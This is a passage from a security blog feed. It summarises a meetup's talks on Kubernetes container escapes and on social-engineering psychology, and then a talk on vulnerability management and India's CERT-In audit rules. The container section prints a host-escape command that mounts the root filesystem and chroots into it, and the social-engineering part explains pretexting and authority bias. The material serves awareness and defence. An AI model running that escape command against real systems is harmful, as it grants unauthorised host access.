class=\"\">mounting sensitive host paths into the container</li>\n<li class=\"\">abusing the Docker socket or similar runtime interfaces</li>\n</ul>\n<p>One of the most commonly cited examples is the misuse of the Docker socket. If a container has access to the host's Docker daemon socket, it may be able to start additional containers with host-level access. This is exactly the kind of vulnerability that can turn a small foothold into a major breach.</p>\n<p>A simple demonstration discussed during the session involved mounting the host filesystem into a container and then accessing the host environment from within it. The example command that was shown was:</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:#F8F8F2;--prism-background-color:#282A36\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:#F8F8F2;background-color:#282A36\"><code class=\"codeBlockLines_e6Vv\"><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token function\" style=\"color:rgb(80, 250, 123)\">docker</span><span class=\"token plain\"> run </span><span class=\"token parameter variable\" style=\"color:rgb(189, 147, 249);font-style:italic\">-v</span><span class=\"token plain\"> /:/host </span><span class=\"token parameter variable\" style=\"color:rgb(189, 147, 249);font-style:italic\">-i</span><span class=\"token plain\"> alpine </span><span class=\"token function\" style=\"color:rgb(80, 250, 123)\">chroot</span><span class=\"token plain\"> /host </span><span class=\"token function\" style=\"color:rgb(80, 250, 123)\">bash</span><br></div></code></pre></div></div>\n<p>This is a classic illustration of how dangerous it can be when a container is given access to the host root filesystem. Once the attacker escapes to the host, the situation changes dramatically because the host often has access to secrets, logs, node credentials, and the broader cluster environment.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"demo-highlights-from-the-session\">Demo highlights from the session<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#demo-highlights-from-the-session\" class=\"hash-link\" aria-label=\"Direct link to Demo highlights from the session\" title=\"Direct link to Demo highlights from the session\" translate=\"no\">​</a></h3>\n<p>The speaker also walked through a small demo involving a vulnerable DNS application and some practical exploitation scenarios.</p>\n<p>Also he recommended checking out - manipulation of Git Hooks to achieve RCE.</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:#F8F8F2;--prism-background-color:#282A36\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:#F8F8F2;background-color:#282A36\"><code class=\"codeBlockLines_e6Vv\"><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">Also a small pun for our Indian readers, the best practice while creating any container is described in a song, which goes like -</span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">Andar se koi bahar na jaa sake, Bahar se koi andar na aa sake, socho kabhi aisa ho toh kya ho, socho kabhi aisa ho toh kya ho</span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">Nothing will happen its just a wet dream of SOC team :)</span><br></div></code></pre></div></div>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"session-2-psychology-of-social-engineering---trust-authority-bias--emotional-triggers-by-prathmesh-dharkar\">Session 2: \"Psychology of Social Engineering - Trust, Authority Bias &amp; Emotional Triggers\" by Prathmesh Dharkar<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#session-2-psychology-of-social-engineering---trust-authority-bias--emotional-triggers-by-prathmesh-dharkar\" class=\"hash-link\" aria-label=\"Direct link to Session 2: &quot;Psychology of Social Engineering - Trust, Authority Bias &amp; Emotional Triggers&quot; by Prathmesh Dharkar\" title=\"Direct link to Session 2: &quot;Psychology of Social Engineering - Trust, Authority Bias &amp; Emotional Triggers&quot; by Prathmesh Dharkar\" translate=\"no\">​</a></h2>\n<p>After a long long long time, I finally heard something related to physical pentesting, IDK in our country, its a very underrated art. Like, I still remember that last time when I heard about something related to physical pentesting it was either Darknet Diaries or it was Deviant Ollam.</p>\n<p>Anyways....\nNow what was the second talk really about? It focused on compromising the people part of physical pentesting... Yeah what we call <strong>Social Engineering</strong>, you all already get that from the title of the session.</p>\n<p>Compromising the human brain or pressing the specific pain points of people to reveal information, noticing patterns, reading the room, etc etc... that's what all <em>social engineering</em> is all about, one of the dark arts of our industry.</p>\n<p>The speaker highlighted that this was one of those talks that should not be limited to just <strong>security people</strong>. If you are in any kind of professional environment, whether you are working in cybersecurity, sales, operations, support, or even everyday life, this talk hits home. Because at the end of the day, a lot of breaches do not start with a technical failure. They start with someone clicking, trusting, panicking, or being pressured into doing something they should not have done.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-main-idea-people-are-the-real-target\">The main idea: people are the real target<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#the-main-idea-people-are-the-real-target\" class=\"hash-link\" aria-label=\"Direct link to The main idea: people are the real target\" title=\"Direct link to The main idea: people are the real target\" translate=\"no\">​</a></h3>\n<p>Social engineering is basically the art of making someone do what you want by playing with trust, emotions, urgency, or bias. It sounds scary because it is. But it is also extremely useful to understand if we want to defend against it.</p>\n<p>The speaker highlighted a few pressure points like <strong>fear</strong>, <strong>panic</strong>, <strong>greed</strong>, <strong>desire</strong>, <strong>curiosity</strong>, <strong>guilt</strong>, <strong>obligation</strong>, <strong>urgency</strong>, <strong>motivation</strong>, and <strong>needs</strong>.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"trust-authority-and-the-human-need-to-comply\">Trust, authority, and the human need to comply<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#trust-authority-and-the-human-need-to-comply\" class=\"hash-link\" aria-label=\"Direct link to Trust, authority, and the human need to comply\" title=\"Direct link to Trust, authority, and the human need to comply\" translate=\"no\">​</a></h3>\n<p>One of the biggest themes of the session was trust. People trust things that look familiar, things that look official, and things that seem to come from someone who has authority. This is known as authority bias.</p>\n<p>The speaker talked about authority bias in a very practical way. If someone appears to be in charge, or if they mention a manager, a team lead, a receptionist, or even a senior executive, the other person may stop questioning and start complying. The whole point is not that the target is stupid. The whole point is that humans are busy, distracted, and often making decisions under pressure.</p>\n<p>This is why the speaker emphasized the importance of not treating every situation as normal just because it looks routine. A lot of people follow the process without thinking too much. And that is exactly where manipulation becomes possible.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"emotional-triggers-are-often-more-powerful-than-technical-tricks\">Emotional triggers are often more powerful than technical tricks<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#emotional-triggers-are-often-more-powerful-than-technical-tricks\" class=\"hash-link\" aria-label=\"Direct link to Emotional triggers are often more powerful than technical tricks\" title=\"Direct link to Emotional triggers are often more powerful than technical tricks\" translate=\"no\">​</a></h3>\n<p>The talk also spent a good amount of time on emotional triggers. Fear makes people react fast. Curiosity makes them click. Greed makes them ignore caution. Guilt makes them feel bad for saying no. Empathy makes them want to help. All of these emotions have been used over and over again in phishing, scams, impersonation, and social attacks.</p>\n<p>The speaker made a very good point here: the attacker often does not need to be brilliant. They only need to know which button to press. If they can trigger the right emotion at the right time, the target may take the action without even realizing what is happening.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"osint-recon-and-the-art-of-preparation\">OSINT, recon, and the art of preparation<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#osint-recon-and-the-art-of-preparation\" class=\"hash-link\" aria-label=\"Direct link to OSINT, recon, and the art of preparation\" title=\"Direct link to OSINT, recon, and the art of preparation\" translate=\"no\">​</a></h3>\n<p>The speaker also shared some examples from real-world experiences, especially around reconnaissance and preparation. Even if the target is a company, an office, or a building, the first step is usually to understand the environment. Who are the people involved? What does the place look like? What is the normal flow of people? What are the visible and invisible barriers? This is where OSINT and recon come into play.</p>\n<p>The talk explained that even basic public information can be valuable. Blueprints, building layouts, lanyards, IDs, office routines, public social media posts, and even casual observations can all become clues.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"pretext-rapport-and-the-power-of-a-believable-story\">Pretext, rapport, and the power of a believable story<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#pretext-rapport-and-the-power-of-a-believable-story\" class=\"hash-link\" aria-label=\"Direct link to Pretext, rapport, and the power of a believable story\" title=\"Direct link to Pretext, rapport, and the power of a believable story\" translate=\"no\">​</a></h3>\n<p>Another big topic in the session was the <strong>pretext</strong>. A pretext is basically a believable reason or story that makes someone accept your presence or your request. You should appear like you belong there, tone should be calm, body language should be confident, etc. People will ask less questions if you really look like its your daily routine.</p>\n<p>The speaker explained that <em>rapport building</em> is not just about being friendly, Its about making the other person feel comfortable enough to continue the conversation, if he/she agrees to do what you say, voilà you already gained their <em>trust</em>, now you can exploit the person to reveal more information.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"situational-awareness-read-the-room-before-you-act\">Situational awareness: read the room before you act<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#situational-awareness-read-the-room-before-you-act\" class=\"hash-link\" aria-label=\"Direct link to Situational awareness: read the room before you act\" title=\"Direct link to Situational awareness: read the room before you act\" translate=\"no\">​</a></h3>\n<p>One of the most practical ideas in the session was situational awareness. In simple terms, it means paying attention to what is going on around you. Who is nervous? Who is talkative? Who looks confident? Who looks out of place? Who is in a hurry? What is the normal flow of the environment? The speaker said that once you understand what normal looks like, it becomes easier to spot the unusual.</p>\n<p>This is an important lesson not just for security professionals, but for everyone. We often walk into a room, a meeting, or a conversation without really observing what is happening. But the people who are good at reading situations are usually the ones who are more difficult to fool.</p>\n<p>The speaker also emphasized body language and behavior. A person’s face, posture, gestures, and tone can reveal a lot. You do not need to become a mind reader. You just need to pay attention.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-alter-ego-angle-becoming-a-role-on-purpose\">The alter ego angle: becoming a role on purpose<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#the-alter-ego-angle-becoming-a-role-on-purpose\" class=\"hash-link\" aria-label=\"Direct link to The alter ego angle: becoming a role on purpose\" title=\"Direct link to The alter ego angle: becoming a role on purpose\" translate=\"no\">​</a></h3>\n<p>The talk also touched on a very interesting idea: the <strong>alter ego</strong>. The speaker did not mean becoming fake or toxic. He meant developing a version of yourself that can step in when needed. In other words, you can train yourself to be calm, confident, and observant when the situation demands it.</p>\n<p>The speaker even talked about creating mental anchors and switching into a more controlled mindset. He said to create boxes with scripts of personas that you want to mimic in your mental space and whenever you want to be that person just think of the script and start mimicking it.\nAlso <em>emotional detachment</em> from the character is also a key part of this practice as you don't want to land up in a gray area where you can't figure out the difference between the real you and your persona.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references-and-further-reading\">References and Further Reading<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#references-and-further-reading\" class=\"hash-link\" aria-label=\"Direct link to References and Further Reading\" title=\"Direct link to References and Further Reading\" translate=\"no\">​</a></h3>\n<p><strong>Kubernetes &amp; Container Security (Session 1)</strong></p>\n<ul>\n<li class=\"\"><a href=\"https://owasp.org/www-project-kubernetes-top-ten/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">OWASP Kubernetes Top 10</a> - A critical awareness document. Pay special attention to <strong>K03: Secrets Management Failures</strong> and <strong>K01: Insecure Workload Configurations</strong>.</li>\n<li class=\"\"><a href=\"https://www.cisa.gov/news-events/alerts/2022/03/15/updated-kubernetes-hardening-guide\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">NSA/CISA Kubernetes Hardening Guidance</a> - Comprehensive best practices on defense-in-depth, RBAC, and preventing container escapes.</li>\n<li class=\"\"><a href=\"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">HackTricks: Docker Breakout / Container Escape</a> - A deep dive into exploiting misconfigurations, including the Docker socket mounts and privileged container escapes demonstrated in the talk.</li>\n<li class=\"\"><a href=\"https://kubernetes.io/docs/concepts/configuration/secret/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Kubernetes Secrets - Official Documentation</a> - Core concepts on how K8s handles (and base64 encodes) secrets natively.</li>\n<li class=\"\"><a href=\"https://kubernetes.io/docs/concepts/security/overview/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Kubernetes Security Overview</a> - High-level cloud-native security principles.</li>\n</ul>\n<p><strong>Psychology, Social Engineering &amp; Physical Pentesting (Session 2)</strong></p>\n<ul>\n<li class=\"\"><em>Social Engineering: The Science of Human Hacking</em> by Christopher Hadnagy - A foundational book on OSINT, pretexting, elicitation, and the psychology of human manipulation.</li>\n<li class=\"\"><em>Influence: The Psychology of Persuasion</em> by Robert B. Cialdini - A must-read on the psychological triggers discussed in the talk, such as Authority Bias, Scarcity, and Reciprocity.</li>\n<li class=\"\"><em>Practical Lock Picking</em> &amp; <em>Keys to the Kingdom</em> by Deviant Ollam - Highly recommended books for understanding the physical security side of the industry.</li>\n<li class=\"\"><a href=\"https://darknetdiaries.com/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Darknet Diaries Podcast</a> - Essential listening for physical red-teaming stories. Check out <strong>Ep 134: Deviant</strong> (featuring Deviant Ollam sharing stories of physical bypasses, lockpicking, and social engineering), <strong>Ep 90: Jenny</strong> (about physical penetration tester Jenny Radcliffe), <strong>Ep 40: No Parking</strong>, and <strong>Ep 41: Just Visiting</strong>.</li>\n<li class=\"\"><a href=\"https://www.social-engineer.org/framework/general-discussion/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Social-Engineer.org (SEORG) Framework</a> - An open-source framework mapping out the dark arts of human hacking, pretexting, and rapport building.</li>\n</ul>",
            "url": "https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary",
            "title": "Summary of HTB Mumbai Meetup held on 01st August 2026",
            "summary": "This blog is a summary of what was taught at  HTB Meetup Mumbai #18 held on 01st August 2026.\n",
            "date_modified": "2026-08-02T04:00:00.000Z",
            "author": {
                "name": "Param Jasani",
                "url": "https://github.com/param-jasani"
            },
            "tags": [
                "K8s",
                "Kubernetes",
                "Containers",
                "Pods",
                "Social-Engineering",
                "Physical-Pentesting",
                "Psychology",
                "HTB-Mumbai-Meetup-Summary"
            ]
        },
        {
            "id": "https://haxnation.github.io/blog/vulnerability-management",
            "content_html": "<p>This blog is a summary of talk held by Qualys titled <em>Surviving CERT-In's 12-Hour SLA Without Mythos</em> on 1st July 2026.</p>\n<p>Picture this: your security team closes 40,000 more vulnerability tickets this year than last year. On paper, that's a win. The charts trend the right way, the quarterly review goes smoothly, everyone claps.</p>\n<p>Except attackers didn't get 40,000 fewer ways in. If anything, they got more.</p>\n<p>That's not a rhetorical setup. It's what the numbers actually show. Research analyzing over a billion resolved vulnerability records tracked against the US government's Known Exploited Vulnerabilities (KEV) catalog, spanning more than 10,000 organizations from 2022 to 2025, found that the sheer volume of vulnerabilities closed grew 6.5x, from 73 million in 2022 to 473 million in 2025. Risk didn't shrink to match it. The share of critical vulnerabilities still sitting open a week after discovery actually rose, from 56% to 63%.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-1-1005ab\" id=\"user-content-fnref-1-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">1</a></sup></p>\n<p>Read that twice. Teams are working harder than ever and losing ground.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"closing-tickets-isnt-the-same-as-closing-risk\">Closing Tickets Isn't the Same as Closing Risk<a href=\"https://haxnation.github.io/blog/vulnerability-management#closing-tickets-isnt-the-same-as-closing-risk\" class=\"hash-link\" aria-label=\"Direct link to Closing Tickets Isn't the Same as Closing Risk\" title=\"Direct link to Closing Tickets Isn't the Same as Closing Risk\" translate=\"no\">​</a></h2>\n<p>Here's the quiet lie most vulnerability management programs run on: a closed ticket means the problem is gone. It usually doesn't. A patch can get deployed and still leave the underlying attack path wide open. A \"critical\" CVE score can flag a system nobody could actually exploit, while a \"medium\" sits ignored on the one server an attacker cares about most.</p>\n<p>CVSS tells you how bad a flaw could theoretically be. It says nothing about whether anyone can actually reach it, whether it sits in front of your crown-jewel systems, or whether a threat actor is using it right now. Independent research on the CISA KEV catalog has found that around 12% of confirmed, actively exploited vulnerabilities carry a CVSS score below 7.0, the threshold many organizations use to decide what even gets triaged.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-2-1005ab\" id=\"user-content-fnref-2-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">2</a></sup> Treat every finding the same way and you end up busy instead of safe, which is exactly what the 6.5x number above shows happening industry-wide.</p>\n<p>There's a second, quieter problem underneath this one: most teams don't actually know what they're protecting in the first place. You can't triage what you can't see. Before prioritization, before remediation, before any of the rest of this, there's a visibility problem that has to get solved first.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"you-cant-protect-what-you-cant-see\">You Can't Protect What You Can't See<a href=\"https://haxnation.github.io/blog/vulnerability-management#you-cant-protect-what-you-cant-see\" class=\"hash-link\" aria-label=\"Direct link to You Can't Protect What You Can't See\" title=\"Direct link to You Can't Protect What You Can't See\" translate=\"no\">​</a></h2>\n<p>Most enterprises don't have a clean asset list. Not really. There's a cloud instance a product team spun up without a ticket. An old on-prem box nobody remembers provisioning. A contractor's laptop still sitting on the VPN six months after the contract ended. A shadow AI tool someone installed to \"just try it out\" that's now quietly connected to internal data.</p>\n<p>Real visibility means pulling from everywhere at once, not from a single scanner running a monthly sweep. A serious inventory has to account for:</p>\n<ul>\n<li class=\"\"><strong>Applications and cloud repositories</strong>, including the ones spun up outside formal change control</li>\n<li class=\"\"><strong>OT/IoT devices</strong>, often invisible to traditional IT scanning</li>\n<li class=\"\"><strong>Internet-facing systems and cloud services</strong>, the stuff attackers find first</li>\n<li class=\"\"><strong>On-prem and known IT assets</strong>, the traditional core, still worth getting right</li>\n<li class=\"\"><strong>Identity</strong>, meaning users, service accounts, and the access tied to each</li>\n<li class=\"\"><strong>Third-party and vendor-connected assets</strong>, risk you don't own but still inherit</li>\n<li class=\"\"><strong>Containers and ephemeral workloads</strong>, assets that might exist for hours, not months</li>\n<li class=\"\"><strong>Unknown or rogue assets</strong>, the ones nobody registered at all</li>\n</ul>\n<p>Getting the full picture usually means combining several detection methods too: native agents and scanners, integration with whatever configuration management database the business already runs on, external attack surface scanning to see what the outside world can see, passive sensors to catch unmanaged devices that active scanning misses, and signal pulled from whatever other security tools are already watching pieces of the estate.</p>\n<p>None of this matters without business context, though. A raw asset list just tells you what exists. What actually drives prioritization is layering in:</p>\n<ul>\n<li class=\"\"><strong>Business role and criticality</strong>: is this system tied to revenue, customer data, or core operations?</li>\n<li class=\"\"><strong>Technical debt</strong>: is it running something end-of-life or end-of-support?</li>\n<li class=\"\"><strong>Missing controls</strong>: does it have the security tooling it should, or has something quietly been skipped?</li>\n</ul>\n<p>Here's what that looks like in practice. Take a single cloud instance running a payment gateway application. As a bare vulnerability finding, it's one line in a spreadsheet, forgettable. Add context and it stops being forgettable fast: this is a Tier 1 critical system tied directly to revenue, it's running an unsupported, end-of-life web server, it has unauthorized remote-access software installed, it has no endpoint detection deployed, and its remote desktop port is exposed to the open internet. That's not a ticket anymore. That's the thing that should be keeping your CISO up at night, and now you actually know it exists.</p>\n<p>A mature program also needs to extend that same visibility beyond traditional IT, into a few areas that get overlooked constantly:</p>\n<ul>\n<li class=\"\"><strong>Software supply chain transparency</strong>: knowing what's actually inside the software you run and ship, continuously, not just at audit time</li>\n<li class=\"\"><strong>AI system governance</strong>: discovering every AI model and workload in use, including shadow AI nobody approved, and testing those systems against adversarial manipulation the same way you'd test any other application</li>\n<li class=\"\"><strong>Application and API security</strong>: covering the full lifecycle from code to production, not just the perimeter</li>\n<li class=\"\"><strong>Configuration drift detection</strong>: catching the moment a hardened system quietly slides out of its secure baseline</li>\n<li class=\"\"><strong>Identity attack path mapping</strong>: finding directory misconfigurations, stale accounts, and privilege escalation chains before someone else does</li>\n<li class=\"\"><strong>Data residency</strong>: for regulated markets, knowing exactly where your logs and incident data physically live, and whether that satisfies local law (more on why this specifically matters in India further down)</li>\n</ul>\n<p>That's the actual job of prioritization: not ranking CVEs by severity, but ranking exposures, real ones, on real systems, tied to real business consequences.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"risk-is-just-money-wearing-a-disguise\">Risk Is Just Money Wearing a Disguise<a href=\"https://haxnation.github.io/blog/vulnerability-management#risk-is-just-money-wearing-a-disguise\" class=\"hash-link\" aria-label=\"Direct link to Risk Is Just Money Wearing a Disguise\" title=\"Direct link to Risk Is Just Money Wearing a Disguise\" translate=\"no\">​</a></h2>\n<p>Security teams love talking about severity. Boards don't care about severity. They care about money, and honestly, they're right to.</p>\n<p>There's a simple way to think about this:</p>\n<p><strong>Risk = Time exposed × Severity × What's actually at stake</strong></p>\n<p>The variable almost nobody tracks is time, specifically, how long a known, exploitable flaw sits open before someone actually closes it. Call it your window of exposure. It's one of the better predictors of whether your program is working, and most companies have no real idea what theirs is.</p>\n<p>Where it lands makes a real difference. Programs built around verified, closed-loop remediation, where a fix isn't considered done until it's re-tested and confirmed, report average exposure windows around 18 days. The typical enterprise, running a standard ticket-and-hope process, sits closer to 67 days.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-1-1005ab\" id=\"user-content-fnref-1-1005ab-2\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">1</a></sup></p>\n<p>Every extra day in that gap isn't just a metric problem. It's a bill waiting to arrive. India recorded the highest average cost of a data breach anywhere in the world in 2025, at ₹22 crore (INR 220 million), a 13% jump from the year before.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-3-1005ab\" id=\"user-content-fnref-3-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">3</a></sup> Incidents where shadow AI played a role cost an additional ₹1.79 crore on average, and it was among the top three cost drivers identified in the same research.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-3-1005ab\" id=\"user-content-fnref-3-1005ab-2\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">3</a></sup> Every day you shave off that exposure window is, quite literally, rupees taken off the table.</p>\n<p>If you want your CFO to actually listen in the next budget meeting, stop leading with vulnerability counts. Lead with what an open exposure is costing the business, per day, in currency they recognize. This is the shift a lot of security leaders still haven't made: moving from talking about attack surface to talking about risk surface, measuring cyber risk the same way the rest of the business measures everything else, in terms of probable loss, and reporting it in language a board can act on without a translator.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"prove-its-actually-fixed\">Prove It's Actually Fixed<a href=\"https://haxnation.github.io/blog/vulnerability-management#prove-its-actually-fixed\" class=\"hash-link\" aria-label=\"Direct link to Prove It's Actually Fixed\" title=\"Direct link to Prove It's Actually Fixed\" translate=\"no\">​</a></h2>\n<p>Good programs don't stop at \"we patched it.\" They run something closer to a four-step loop:</p>\n<ol>\n<li class=\"\"><strong>Pick what matters</strong>, using business criticality and real threat activity, not a raw severity score alone</li>\n<li class=\"\"><strong>Check if it's actually exploitable</strong>, by running safe, controlled exploit checks against the real environment, not a lab. The answer should be binary: exploitable here, with these controls, or not</li>\n<li class=\"\"><strong>Weigh the fix carefully</strong>, because a bad patch causing an outage is its own kind of risk. Mature programs score patches for reliability, built from a large historical base of prior deployments, before pushing anything out at scale</li>\n<li class=\"\"><strong>Prove the door is shut</strong>, by re-testing after remediation and generating real evidence, ideally something tamper-proof, that the exploit path is genuinely closed</li>\n</ol>\n<p>That last step is the one almost everyone skips. A closed ticket says a task got done. A verified fix says the risk is gone. Those aren't the same claim, and only one of them should let you sleep at night. The service-level agreement that actually matters isn't \"ticket closed.\" It's \"exploit path confirmed closed,\" and very few programs measure against that bar today.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"manual-remediation-doesnt-scale-anymore\">Manual Remediation Doesn't Scale Anymore<a href=\"https://haxnation.github.io/blog/vulnerability-management#manual-remediation-doesnt-scale-anymore\" class=\"hash-link\" aria-label=\"Direct link to Manual Remediation Doesn't Scale Anymore\" title=\"Direct link to Manual Remediation Doesn't Scale Anymore\" translate=\"no\">​</a></h2>\n<p>Once you know what to fix, \"how\" becomes the bottleneck. Most organizations still route every fix through a human decision, and there simply aren't enough hours in the week for that anymore at the volume modern estates generate. A smarter approach maps each exposure to whichever action actually fits, automatically:</p>\n<ul>\n<li class=\"\"><strong>Patch it</strong>, across Windows, macOS, Linux, and third-party apps, with zero-touch automation for the low-risk cases and a reliability check before anything ships broadly</li>\n<li class=\"\"><strong>Remove it</strong>, uninstalling bloatware or unused software that's quietly widening the attack surface, based on actual usage and dependency data rather than guesswork</li>\n<li class=\"\"><strong>Mitigate it</strong>, reducing exposure when no patch exists yet, or when patching carries too much operational risk to push immediately</li>\n<li class=\"\"><strong>Script around it</strong>, using pre-built scripts for the messy, recurring cases, or custom ones built for first-party applications that don't fit a standard playbook</li>\n<li class=\"\"><strong>Isolate it</strong>, as a genuine last resort, containing a high-risk device from the rest of the network while it gets patched remotely</li>\n</ul>\n<p>None of this replaces judgment. It replaces the assumption that every single fix needs a person to manually decide, ticket, assign, chase, and confirm by hand, an assumption that simply doesn't hold up against a 6.5x increase in remediation volume.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"ai-is-changing-both-sides-of-this-fight\">AI Is Changing Both Sides of This Fight<a href=\"https://haxnation.github.io/blog/vulnerability-management#ai-is-changing-both-sides-of-this-fight\" class=\"hash-link\" aria-label=\"Direct link to AI Is Changing Both Sides of This Fight\" title=\"Direct link to AI Is Changing Both Sides of This Fight\" translate=\"no\">​</a></h2>\n<p>It's worth being honest about where AI actually fits into all this, because it cuts both ways.</p>\n<p>On the defensive side, mature platforms are increasingly running a mix of AI models rather than betting on one: lightweight, efficient models handling high-volume routine automation, and larger reasoning-focused models brought in for genuinely complex analysis, where cost matters less than getting the right answer. There's also a growing pattern of security vendors partnering directly with AI research labs on distinctly offensive-adjacent use cases, applied defensively: vulnerability research, zero-day discovery, exploit development, malware reverse engineering, and red teaming. Essentially, the same capabilities attackers are developing get pointed inward first, before someone else points them at you.</p>\n<p>That same shift is reaching further left into the development pipeline too. AI-assisted static code analysis is increasingly feeding straight into vulnerability management: findings from source code get imported automatically, runtime context gets applied to prioritize what actually matters, and the resulting list gets patched in order of real risk rather than however the code scanner happened to sort it.</p>\n<p>The uncomfortable flip side is that attackers are using the same category of tools to move faster too: faster reconnaissance, faster exploit development, more convincing social engineering. This isn't a distant concern either. In May 2026, India's insurance regulator directed every insurer in the country to submit a formal action-taken report on their AI cyber readiness, specifically citing the risk of frontier AI systems being used to accelerate attacks.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-4-1005ab\" id=\"user-content-fnref-4-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">4</a></sup> AI hasn't changed what good security fundamentals look like. It's just made the cost of skipping them higher, and the timeline for getting caught shorter.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-part-most-programs-are-missing-regulators-want-exactly-the-same-thing\">The Part Most Programs Are Missing: Regulators Want Exactly the Same Thing<a href=\"https://haxnation.github.io/blog/vulnerability-management#the-part-most-programs-are-missing-regulators-want-exactly-the-same-thing\" class=\"hash-link\" aria-label=\"Direct link to The Part Most Programs Are Missing: Regulators Want Exactly the Same Thing\" title=\"Direct link to The Part Most Programs Are Missing: Regulators Want Exactly the Same Thing\" translate=\"no\">​</a></h2>\n<p>This is where it stops being optional.</p>\n<p>On July 25, 2025, India's national cybersecurity agency, CERT-In, released a sweeping new set of Comprehensive Cyber Security Audit Policy Guidelines, and they read like someone took everything above and wrote it into law.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-5-1005ab\" id=\"user-content-fnref-5-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">5</a></sup> Every organization, public or private, that owns or runs digital systems now has to undergo a full cybersecurity audit of its ICT systems at least once a year. Not a checkbox review. A real one.</p>\n<p>A few details matter more than the rest:</p>\n<ul>\n<li class=\"\"><strong>You must maintain a live inventory of every authorized asset</strong>, hardware and software both, with proper patch management behind it. Legacy systems can no longer be waved away as \"out of scope.\" They have to be documented, with a formal, signed-off risk exception if they're staying as they are.</li>\n<li class=\"\"><strong>Every finding needs two scores, not one</strong>: traditional severity, plus a real-world likelihood-of-exploitation score, mapped back to standard weakness and vulnerability identifiers.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-6-1005ab\" id=\"user-content-fnref-6-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">6</a></sup> That's the same \"don't just trust the CVSS number\" logic good remediation programs already run on, now written into a compliance requirement.</li>\n<li class=\"\"><strong>Audit reports must translate technical findings into business risk for top management.</strong> Dashboards and jargon aren't good enough anymore. Risk has to be understandable, and quantifiable, to people who don't read CVE identifiers for a living.</li>\n<li class=\"\"><strong>Senior management now has to review audit scopes, approve remediation actions, and own the security posture directly.</strong> There's no more delegating that accountability quietly down to an engineer's backlog.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-7-1005ab\" id=\"user-content-fnref-7-1005ab\" data-footnote-ref=\"\" 